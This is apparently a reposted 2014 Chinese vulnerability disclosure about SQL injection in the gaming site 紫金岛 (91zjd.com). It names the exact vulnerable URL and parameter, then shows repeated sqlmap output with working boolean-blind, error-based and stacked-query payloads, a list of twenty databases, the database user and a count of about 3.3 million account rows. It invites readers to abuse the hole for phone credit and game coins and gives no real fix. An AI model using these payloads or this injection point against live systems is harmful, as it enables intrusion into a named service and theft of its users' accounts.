紫金岛SQL注入漏洞和修复方法(300万游戏账户可泄露)下载

来源:黑吧安全网 浏览:1132次 时间:2014-05-07
做网站找雨过天晴工作室

紫金岛SQL注入漏洞300万游戏账户可泄露

"紫金岛"SQL注射漏洞,多个棋牌数据库爆库,300万游戏账户存在泄露风险。

兑话费,加金币,一夜从屌丝变高富帅.漏洞站:紫金岛(http://www.91zjd.com/)



注入点:http://www.91zjd.com/smsqw/dxzc_ctcc.asp?username=admin

 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [20]:
[*] DB_BACKUP
[*] master
[*] model
[*] msdb
[*] QPGameBSTEST
[*] QPGameDB
[*] QPGameHFDB
[*] QPGameJDDB
[*] QPGameTYDB
[*] QPGameUserDB
[*] QPPromotionDB
[*] QPServerInfoDB
[*] QPServerInfoDB_NEW
[*] QPTreasureDB
[*] QPTreasureMatchDB
[*] QPWebGameDB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZjdGameWebDB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'game_db_user'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Select count(*) from AccountsInfo: '3339832'

 

修复方案:

这个大家都懂的,只是sql注入点还有很多,我就不一一列出了,请自行检查。